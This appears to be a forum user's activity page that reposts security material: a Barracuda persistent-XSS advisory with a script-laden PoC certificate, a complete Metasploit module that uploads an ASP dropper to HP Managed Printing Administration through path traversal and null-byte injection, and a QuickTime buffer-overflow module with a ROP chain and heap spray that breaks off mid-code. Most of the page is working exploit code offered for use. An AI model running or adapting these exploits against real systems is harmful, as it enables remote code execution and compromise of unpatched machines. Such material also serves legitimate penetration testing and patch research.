Jump to content

Matt

Active Members
 View Profile  See their activity

  • Posts

    1773

  • Joined

  • Last visited

  • Days Won

    6

 Content Type 

Everything posted by Matt

  1. Matt
    Author : Vulnerability-Lab Source : Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities Code : Title: ====== Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities Date: ===== 2013-07-18 References: =========== http://www.vulnerability-lab.com/get_content.php?id=727 Note: The issue was part of the official Barracuda Networks Bug Bounty Program. VL-ID: ===== 727 Common Vulnerability Scoring System: ==================================== 4.1 Introduction: ============= The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware from your organization. No more productivity loss trying to repair computers or make computers usable again. Blocks access to Web sites based on domain, URL pattern, or content category Blocks downloads based on file type Blocks applications that access the Internet, including IM, music services, and software update utilities Integrates with safe search filters built into popular images search engines Provides integrated gateway and desktop spyware protection Uses Barracuda Web Security Agents compatible with Windows PC’s and Macs to enforce Internet policies on off-network computers The Barracuda Web Filter combines preventative, reactive, and proactive measures to form a complete Web filtering solution. Designed for the enterprise, the Barracuda Web Filter enables you to set up custom policies for particular users and groups across customizable time ranges. The Barracuda Web Filter integrates with popular LDAP directory servers, such as Microsoft Active Directory, for both authentication and group membership information on which to apply custom policies. Sample uses of group policies include: Restricting access to job board Web sites to only the Human Resources group Defining separate policies for teachers and students at a school Enabling compliance officers unrestricted access to the Web for investigation Providing external instant messaging (e.g., AIM) access only to specific users or groups Restricting personal Web browsing to non-working hours For organizations that do not utilize directory servers, policies can be defined for unauthenticated users as a whole, locally defined users and groups, or network IP address ranges. (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-filter-overview.php ) The Barracuda Email Security Service is a comprehensive and affordable cloud-based email security service that protects both inbound and outbound email against the latest spam, viruses, worms, phishing and denial of service attacks. Barracuda Email Security Service also includes email encryption and Data Loss Prevention features. The Barracuda Email Security Service leverages advanced security technologies from the industry-leading Barracuda Spam & Virus Firewall and features rich multiple cloud-based protection: Rate control and Denial of Service (DoS) protection Reputation-based blocking from known spam and malware sources Anti-virus, featuring the patent-pending Barracuda Anti-Virus Supercomputing Grid Anti-phishing, using the Barracuda Anti-Fraud Intelligence Protection against spam, phishing, fraud and emails with other malicious intent Custom sender/recipient policy Comprehensive Protection Spam and viruses are blocked in the cloud prior to delivery to the customer, saving network bandwidth and providing additional Denial of Service protection. In addition to network bandwidth savings, cloud-based filtering offloads any processing required for spam and virus filtering from the email server. By leveraging the compute capacity available in the cloud, patent-pending Barracuda Anti-Virus Supercomputing Grid not only detects new outbreaks similar to known viruses, it also identifies new threats for which signatures have never existed. (Copy of the Vendor Homepage: https://www.barracudanetworks.com/ns/products/bess_overview.php ) The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. The Barracuda Web Application Firewall provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site. * Protection against common attacks * Outbound data theft protection * Web site cloaking * Granular policies * Secure HTTP traffic * SSL Offloading * SSL Acceleration * Load Balancing The Barracuda Web Application Firewall protects Web applications and Web services from malicious attacks, and can also increase the performance and scalability of these applications. The Barracuda Web Application Firewall offers every capability needed to deliver, secure and manage enterprise Web applications from a single appliance through an intuitive, real-time user interface. * Single point of protection for inbound and outbound traffic for all Web applications * Protects Web sites and Web applications against application layer attacks * Delivers best practices security right out of the box * Monitors traffic and provides reports about attackers and attack attempts The Barracuda Web Application Firewall provides award-winning protection from all common attacks on Web applications, including SQL injections, cross-site scripting attacks, session tampering and buffer overflows. Many applications are vulnerable to such attacks because application developers do not consistently employ secure coding practices. Barracuda Web Application Firewall is designed to combat all attack types that have been categorized as significant threats, including: * Cross Site Scripting (XSS) * SQL injection flaws * OS command injections * Site reconnaissance * Session hijacking * Application denial of service * Malicious probes/crawlers * Cookie/session tampering * Path traversal * Information leakage ... (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple persistent vulnerabilities in the official Barracuda Product Series of the Load Balancer, Web Firewall, Web Filter and Spam & Virus Firewall. Report-Timeline: ================ 2012-10-18: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2012-10-19: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program) 2012-10-21: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program) 2013-04-30: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow] 2013-07-18: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Barracuda Networks Product: Load Balancer 4.2.0.015 Modell 640 Barracuda Networks Product: Spam & Virus Firewall 5.1.1.006 Modell 600 Barracuda Networks Product: Web Filter 6.0.0.013 Modell 910 Barracuda Networks Product: Web Firewall 7.7.0.020 Modell 650 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== Multiple persistent input validation vulnerabilities are detected in the official Barracuda Product Series of the Load Balancer, Web Firewall, Web Filter and Spam & Virus Firewall. The web vulnerabilities allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent web vulnerability is located in the certificate management listing module with the bound vulnerable certificate common name, certificate name & services name parameters. The vulnerability can be exploited by customers to execute script code in the certificate management module listing. The remote attackers can import a own generated ssl pem certificates with manipulated name, service and common certificate name. The injected script code of the pem certificate get executed from the main certificate listing when processing to display the malicious stored script code context. The bug is located in different sections of the web firewall, load balancer, spam and virus firewall or the new web filter. Affected by the vulnerable input are the Available Certificates, Edit Certificates, Trusted Hosts > Certificates, Saved Certificates and the Save Token Certificate Name listings. Exploitation of the vulnerabilities requires a low privilege application user account and low or medium user interaction. Successful exploitation of the vulnerabilities can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation of the vulnerability requires low or medium user interaction & low or medium privilege web application user account. Vulnerable Module(s): [+] Web Filter & Web Firewall - Advanced (Extended) > SSL Inspection > Certificate Creation [x] CHECK > Zertifikat Generierung [+] Spam & Virus - Sicherheitsverwaltung > Konfiguration der SSL-Zertifikate > Trusted (Bestätigt durch CA) [+] Spam & Virus - Sicherheitsverwaltung > Certificate Signing Request (CSR) > Edit Data Listing [+] Load Balancer - Zertifikat Generierung (INDEX) Vulnerable Parameter(s): [+] Certificate Name [+] Certificate Service [+] Certificates - Common Name Affected Section(s): [+] Available Certificates - LISTING [+] Edit Certificates - LISTING [+] Trusted Hosts > Certificates - LISTING [+] Saved Certificates - LISTING [+] Save Token Certificate Name - LISTING Proof of Concept: ================= The vulnerabilities can be exploited by remote attackers with low or medium privilege application user account and with low or medium user interaction. For demonstration or reproduce ... Review: Save Token - Certificate Name [index.cgi-save_token-listing] <tr><td valign="top"><table class="config_module_inner" summary="Config Module" cellpadding="0" cellspacing="0" width="100%"> <tbody> <tr class="config_module_tr" id="config_module_row_1"> <td valign="top" width="15"> </td> <td valign="top" width="200">Certificate</td> <td valign="top" width="250">[<PERSISTENT MALICIOUS INJECTED SCRIPT CODE!>]</td> </tr> Reference(s): (Insert) http://waf.127.0.0.1:1339/cgi-mod/index.cgi?auth_type=Local&et=1350361913&locale=de_DE&password=5f879645e0954166ac51efe3be737a2a &user=benjamin&primary_tab=BASIC&secondary_tab=server_certs http://waf.127.0.0.1:1339/cgi-mod/index.cgi?password=5f8796456ac51efe3be737a2a&et=1350361913&primary_tab=BASIC&content_only=1 &new_secondary_tab=server_certs&auth_type=Local&user=benjamin&locale=de_DE&secondary_tab=create_certificate_details&ispopup=1 &parent_name=server_certs&popup_width=800&popup_height=500 Reference(s): (Affected) http://waf.127.0.0.1:1339/cgi-mod/index.cgi?password=fb911a7a8bebac208fcab7e79e5&et=1350361362&primary_tab=BASIC&new_secondary_tab=server_certs& serial=50943090&auth_type=Local&locale=de_DE&secondary_tab=save_pkcs_token&content_only=1&index=md5skeqylXIOusxkfzaKf19VQ&user=guest &type=server_cert_external&ispopup=1&parent_name=certificates&popup_width=650&popup_height=200 Review: Available Certificates - Certificate Name [index.cgi-available_certificates-listing] class="config_module_tr" id="config_module_row_1"> <td valign="top" width="15"> </td> <td valign="top" width="210"><div id="helpbox"><b class="outlinetop"> <b class="outline1"></b> <b class="outline2"></b> <b class="outline3"></b> <b class="outline4"></b></b> <div id="contents"><div><[<MALICIOUS PERSISTENT INJECTED SCRIPT CODE!>]"></div></div> Reference(s): (Insert) http://webfilter.127.0.0.1:1339/cgi-mod/index.cgi?auth_type=Local&et=1350718546&locale=de_DE&password=0da45d48882cac50687e539e6 &primary_tab=ADVANCED&secondary_tab=ssl_certificates&user=benjamin Reference(s): (Affected) Sicherheitsverwaltung > Certificate Signing Request (CSR) > Edit Data Listing http://spam4.127.0.0.1:1339/cgi-mod/index.cgi?password=fb85b10f5d66b87b1194fef&et=1350572565&primary_tab=ADVANCED& content_only=1&new_secondary_tab=ssl&auth_type=Local&user=benjamin&locale=de_DE&secondary_tab=create_csr&ispopup=1& parent_name=ssl&popup_width=900&popup_height=455 Sicherheitsverwaltung > Konfiguration der SSL-Zertifikate > Trusted (Bestätigt durch CA) http://spam4.127.0.0.1:1339/cgi-mod/index.cgi?&user=benjamin&password=06577ccae825950cd833027d&et=1350572515&auth_type=Local&locale=de_DE &primary_tab=ADVANCED&secondary_tab=ssl Review: Saved Certificates - Listing (Name) <td style="width: 220px;"><div style="padding-left:30px"><img src="index.cgi-Dateien/cert.png" align="bottom" border="0"> <a title=""><<MALICIOUS PERSISTENT INJECTED SCRIPT CODE!>;)" <"="">"><<MALICIOUS PERSISTENT INJECTED SCRIPT CODE!>") <</a></div></td> Reference(s): (Insert) Zertifikat Generierung (INDEX) http://balancer.127.0.0.1:1339/cgi-mod/index.cgi?password=66690cf1f1f6ad9f097e077355a&et=1350476026&primary_tab=BASIC&content_only=3 &new_secondary_tab=certificates&auth_type=Local&user=benjamin&locale=de_DE&secondary_tab=create_certificate_details&ispopup=1 &parent_name=certificates&popup_width=1000&popup_height=410 PoC as Certificate (PEM): -----BEGIN CERTIFICATE----- MIIFzjCCBLagAwIBAgIBADANBgkqhkiG9w0BAQUFADCB+TELMAkGA1UEBhMCREUx JDAiBgNVBAgTG2lmcmFtZSBzcmNhIG9ubG9hZGFsZXJ0VkwgIDEkMCIGA1UEBxMb aWZyYW1lIHNyY2Egb25sb2FkYWxlcnRWTCAgMSUwIwYDVQQKExxpZnJhbWUgc3Jj YSBvbmxvYWRhbGVydFZMICAzMSUwIwYDVQQLExxpZnJhbWUgc3JjYSBvbmxvYWRh bGVydFZMICA0MSQwIgYDVQQDExtpZnJhbWVzcmNhb25sb2FkYWxlcnR2bGdvYWwx KjAoBgkqhkiG9w0BCQEWG2FkbWluQHZ1bG5lcmFiaWxpdHktbGFiLmNvbTAeFw0x MjEwMTYwMzA0MjRaFw0xMzEwMTYwMzA0MjRaMIH5MQswCQYDVQQGEwJERTEkMCIG A1UECBMbaWZyYW1lIHNyY2Egb25sb2FkYWxlcnRWTCAgMSQwIgYDVQQHExtpZnJh bWUgc3JjYSBvbmxvYWRhbGVydFZMICAxJTAjBgNVBAoTHGlmcmFtZSBzcmNhIG9u bG9hZGFsZXJ0VkwgIDMxJTAjBgNVBAsTHGlmcmFtZSBzcmNhIG9ubG9hZGFsZXJ0 VkwgIDQxJDAiBgNVBAMTG2lmcmFtZXNyY2FvbmxvYWRhbGVydHZsZ29hbDEqMCgG CSqGSIb3DQEJARYbYWRtaW5AdnVsbmVyYWJpbGl0eS1sYWIuY29tMIIBIjANBgkq hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqE35D0H4uFm9Rzo27xGmFNcYG5YS2qfh sCzL2IUikMUFGlHpKtqzsy4AKh5eUoelqIiEJRkIowvLbUsD9aKkXiKz432btqir zJNBYwivm8kBkY/OMWJUFFU6GW8CGD6DW5jHaKuM8hO+TjmOyYzRvBQdcdIJLmr3 4oQPIGMIAEu9GZ8BJIwqutuZOYS+WLjNh7nRx+IrhDOap4GGo/bRmDdzxD0hXD3A chSByxZrNDbqeH2kMybLQxqroOfsRO3hanqpAVIG/waLxPqwcvCgcRSYn89T7eEw +YiE39Zji79ISXipua8tJSN6PIgxFv0s1fNFe4hV0O4WEokV7jHyNwIDAQABo4IB XTCCAVkwHQYDVR0OBBYEFHIofDj443DxVAe03kF0TAXwEz4tMIIBKAYDVR0jBIIB HzCCARuAFHIofDj443DxVAe03kF0TAXwEz4toYH/pIH8MIH5MQswCQYDVQQGEwJE RTEkMCIGA1UECBMbaWZyYW1lIHNyY2Egb25sb2FkYWxlcnRWTCAgMSQwIgYDVQQH ExtpZnJhbWUgc3JjYSBvbmxvYWRhbGVydFZMICAxJTAjBgNVBAoTHGlmcmFtZSBz cmNhIG9ubG9hZGFsZXJ0VkwgIDMxJTAjBgNVBAsTHGlmcmFtZSBzcmNhIG9ubG9h ZGFsZXJ0VkwgIDQxJDAiBgNVBAMTG2lmcmFtZXNyY2FvbmxvYWRhbGVydHZsZ29h bDEqMCgGCSqGSIb3DQEJARYbYWRtaW5AdnVsbmVyYWJpbGl0eS1sYWIuY29tggEA MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBABiGKfDora8sj8YWgnFb WNyvnkaah5Ds21nFaN5I3ReSPLDGEAdRYSI3K9g9LjHLIkyUT2kDChLXPnm6Gbuu BVGUKQpZV+ORbB5J1NvmFJlyCVU+3PmU5JFggmsuBRSI1sIsUvyVdRxeasnhlw7i ZwtWAz1D13+zfb60QZc+Ekvn2d2RKFQ5eWxGrlEZ3niRjcO9Jr/HVE66HTzf6AUn r1zcu/7IqNr9wI0I9cQx2lnR9GgpSP3gBH7F5SXw6b1dLvHVIgcnd62JzyJNrQ1B dQYTStsbK710ik9OKq86j8tgQ9Q0TdLh7t9KncRmlZtxZSeYkzM9j1vdDpSrMMHU 3xU= -----END CERTIFICATE----- Solution: ========= The vulnerabilities can be patched by parsing the affected (displayed) certificate value(s) output listing. Restrict and parse the input fields (function) of trusted and self signed certificates values to prevent future executions out of the certificate context. Risk: ===== The security risk of the persistent input validation web vulnerabilities are estimated as high(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com
  2. Matt
    Author : metasploit Source : HP Managed Printing Administration jobAcct Remote Command Execution Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize super( 'Name' => 'HP Managed Printing Administration jobAcct Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability on HP Managed Printing Administration 2.6.3 (and before). The vulnerability exists in the UploadFiles() function from the MPAUploader.Uploader.1 control, loaded and used by the server. The function can be abused via directory traversal and null byte injection in order to achieve arbitrary file upload. In order to exploit successfully, a few conditions must be met: 1) A writable location under the context of Internet Guest Account (IUSR_*), or Everyone is required. By default, this module will attempt to write to /hpmpa/userfiles/, but you may specify the WRITEWEBFOLDER datastore option to provide another writable path. 2) The writable path must also be readable by a browser, this typically means a location under wwwroot. 3) You cannot overwrite a file with the same name as the payload. }, 'Author' => [ 'Andrea Micalizzi', # aka rgod - Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'Platform' => 'win', 'References' => [ ['CVE', '2011-4166'], ['OSVDB', '78015'], ['BID', '51174'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-352/'], ['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469'] ], 'Targets' => [ [ 'HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]', { } ], ], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Dec 21 2011' ) register_options( [ OptString.new('WRITEWEBFOLDER', [ false, "Additional Web location with file write permissions for IUSR_*" ]) ], self.class) end def peer return "#{rhost}:#{rport}" end def webfolder_uri begin u = datastore['WRITEWEBFOLDER'] u = "/" if u.nil? or u.empty? URI(u).to_s rescue ::URI::InvalidURIError print_error "Invalid URI: #{datastore['WRITEWEBFOLDER'].inspect}" return "/" end end def to_exe_asp(exes = '') var_func = Rex::Text.rand_text_alpha(rand(8)+8) var_stream = Rex::Text.rand_text_alpha(rand(8)+8) var_obj = Rex::Text.rand_text_alpha(rand(8)+8) var_shell = Rex::Text.rand_text_alpha(rand(8)+8) var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8) var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8) var_basedir = Rex::Text.rand_text_alpha(rand(8)+8) var_f64name = Rex::Text.rand_text_alpha(rand(8)+8) arg_b64string = Rex::Text.rand_text_alpha(rand(8)+8) var_length = Rex::Text.rand_text_alpha(rand(8)+8) var_out = Rex::Text.rand_text_alpha(rand(8)+8) var_group = Rex::Text.rand_text_alpha(rand(8)+8) var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) var_counter = Rex::Text.rand_text_alpha(rand(8)+8) var_char = Rex::Text.rand_text_alpha(rand(8)+8) var_thisdata = Rex::Text.rand_text_alpha(rand(8)+8) const_base64 = Rex::Text.rand_text_alpha(rand(8)+8) var_ngroup = Rex::Text.rand_text_alpha(rand(8)+8) var_pout = Rex::Text.rand_text_alpha(rand(8)+8) vbs = "<%\r\n" # ASP Base64 decode from Antonin Foller http://www.motobit.com/tips/detpg_base64/ vbs << "Function #{var_f64name}(ByVal #{arg_b64string})\r\n" vbs << "Const #{const_base64} = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n" vbs << "Dim #{var_length}, #{var_out}, #{var_group}\r\n" vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbCrLf, \"\")\r\n" vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbTab, \"\")\r\n" vbs << "#{arg_b64string} = Replace(#{arg_b64string}, \" \", \"\")\r\n" vbs << "#{var_length} = Len(#{arg_b64string})\r\n" vbs << "If #{var_length} Mod 4 <> 0 Then\r\n" vbs << "Exit Function\r\n" vbs << "End If\r\n" vbs << "For #{var_group} = 1 To #{var_length} Step 4\r\n" vbs << "Dim #{var_bytes}, #{var_counter}, #{var_char}, #{var_thisdata}, #{var_ngroup}, #{var_pout}\r\n" vbs << "#{var_bytes} = 3\r\n" vbs << "#{var_ngroup} = 0\r\n" vbs << "For #{var_counter} = 0 To 3\r\n" vbs << "#{var_char} = Mid(#{arg_b64string}, #{var_group} + #{var_counter}, 1)\r\n" vbs << "If #{var_char} = \"=\" Then\r\n" vbs << "#{var_bytes} = #{var_bytes} - 1\r\n" vbs << "#{var_thisdata} = 0\r\n" vbs << "Else\r\n" vbs << "#{var_thisdata} = InStr(1, #{const_base64}, #{var_char}, vbBinaryCompare) - 1\r\n" vbs << "End If\r\n" vbs << "If #{var_thisdata} = -1 Then\r\n" vbs << "Exit Function\r\n" vbs << "End If\r\n" vbs << "#{var_ngroup} = 64 * #{var_ngroup} + #{var_thisdata}\r\n" vbs << "Next\r\n" vbs << "#{var_ngroup} = Hex(#{var_ngroup})\r\n" vbs << "#{var_ngroup} = String(6 - Len(#{var_ngroup}), \"0\") & #{var_ngroup}\r\n" vbs << "#{var_pout} = Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 1, 2))) + _\r\n" vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 3, 2))) + _\r\n" vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 5, 2)))\r\n" vbs << "#{var_out} = #{var_out} & Left(#{var_pout}, #{var_bytes})\r\n" vbs << "Next\r\n" vbs << "#{var_f64name} = #{var_out}\r\n" vbs << "End Function\r\n" vbs << "Sub #{var_func}()\r\n" vbs << "#{var_bytes} = #{var_f64name}(\"#{Rex::Text.encode_base64(exes)}\")\r\n" vbs << "Dim #{var_obj}\r\n" vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n" vbs << "Dim #{var_stream}\r\n" vbs << "Dim #{var_tempdir}\r\n" vbs << "Dim #{var_tempexe}\r\n" vbs << "Dim #{var_basedir}\r\n" vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n" vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n" vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n" vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n" vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n" vbs << "#{var_stream}.Write #{var_bytes}\r\n" vbs << "#{var_stream}.Close\r\n" vbs << "Dim #{var_shell}\r\n" vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n" vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n" vbs << "End Sub\r\n" vbs << "#{var_func}\r\n" vbs << "%>\r\n" vbs end def upload(contents, location) post_data = Rex::MIME::Message.new post_data.add_part("upload", nil, nil, "form-data; name=\"upload\"") post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"..\\../../wwwroot#{location}\x00.tmp\"") data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi({ 'uri' => normalize_uri("hpmpa", "jobAcct", "Default.asp"), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => data, 'encode_params' => false, 'vars_get' => { 'userId' => rand_text_numeric(2+rand(2)), 'jobId' => rand_text_numeric(2+rand(2)) } }) return res end def check res = send_request_cgi({'uri' => normalize_uri("hpmpa", "home", "Default.asp")}) version = nil if res and res.code == 200 and res.body =~ /HP Managed Printing Administration/ and res.body =~ /<dd>v(.*)<\/dd>/ version = $1 else return Exploit::CheckCode::Safe end vprint_status("HP MPA Version Detected: #{version}") if version <= "2.6.3" return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit # Generate the ASP containing the EXE containing the payload exe = generate_payload_exe # Not using Msf::Util::EXE.to_exe_asp because the generated vbs is too long and the app complains asp = to_exe_asp(exe) # # UPLOAD # asp_name = "#{rand_text_alpha(5+rand(3))}.asp" locations = [ "/hpmpa/userfiles/images/printers/", "/hpmpa/userfiles/images/backgrounds/", "/hpmpa/userfiles/images/", "/hpmpa/userfiles/", "/" ] locations << normalize_uri(webfolder_uri, asp_name) if datastore['WRITEWEBFOLDER'] payload_url = "" locations.each {|location| asp_location = location + asp_name print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...") res = upload(asp, asp_location) if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/ print_good("#{peer} - ASP Payload successfully wrote to #{location}") payload_url = asp_location break elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/ print_error("#{peer} - Error probably due to permissions while writing to #{location}") else print_error("#{peer} - Unknown error while while writing to #{location}") end } if payload_url.empty? fail_with(Exploit::Failure::NotVulnerable, "#{peer} - Failed to upload ASP payload to the target") end # # EXECUTE # print_status("#{peer} - Executing payload through #{payload_url}...") send_request_cgi({ 'uri' => payload_url}) end end
  3. Matt
    Author : metasploit Source : http://www.exploit-db.com/exploits/27012/ Vulnerable App : Link Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Apple Quicktime. The flaw is triggered when Quicktime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor 'Tom Gallagher', # Original Discovery (overlapped) 'Paul Bates', # Original Discovery (overlapped) 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-1017' ], [ 'BID', '60097' ], [ 'URL', 'http://support.apple.com/kb/HT5770' ] ], 'Platform' => 'win', 'Targets' => [ # All of the following addresses are from Quicktime.qts # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ], [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ], [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ], [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ] ], 'Payload' => { 'BadChars' => "\x00" # js_property_spray no like nilz }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "May 22 2013" )) end def get_payload(t) p = '' rop = [ 0x77c1e844, # POP EBP # RETN [msvcrt.dll] 0x77c1e844, # skip 4 bytes [msvcrt.dll] 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] 0xffffffff, 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77c34fcd, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] 0x77c3048a, # POP EDI # RETN [msvcrt.dll] 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] 0x77c46efb, # POP ESI # RETN [msvcrt.dll] 0x77c2aacc, # JMP [EAX] [msvcrt.dll] 0x77c3b860, # POP EAX # RETN [msvcrt.dll] 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] ].pack("V*") p << rop p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 p << payload.encoded p end def targetable?(agent) if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/ return true elsif agent =~ /contype/ # contype: a mov file request from Apple Quicktime return true end false end def get_html(t) js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch)) fake_mov_name = rand_text_alpha(4) + ".mov" html = %Q| <html> <head> <script> #{js_property_spray} var s = unescape("#{js_p}"); sprayHeap({shellcode:s}); </script> </head> <body> <embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed> </body> </html> | html.gsub(/^\t\t/, '') end def on_request_uri(cli, request) agent = request.headers['User-Agent'] print_status("Requesting: #{request.uri}") unless targetable?(agent) print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end print_status("Target selected as: #{target.name}") if target if request.uri =~ /\.mov$/ print_status("Sending specially crafted .mov file") send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' }) else html = get_html(target) send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' }) end end def sort_bytes(data) data.map { |e| [e].pack('N').scan(/../).reverse.join }.join end def rop_nop(t) 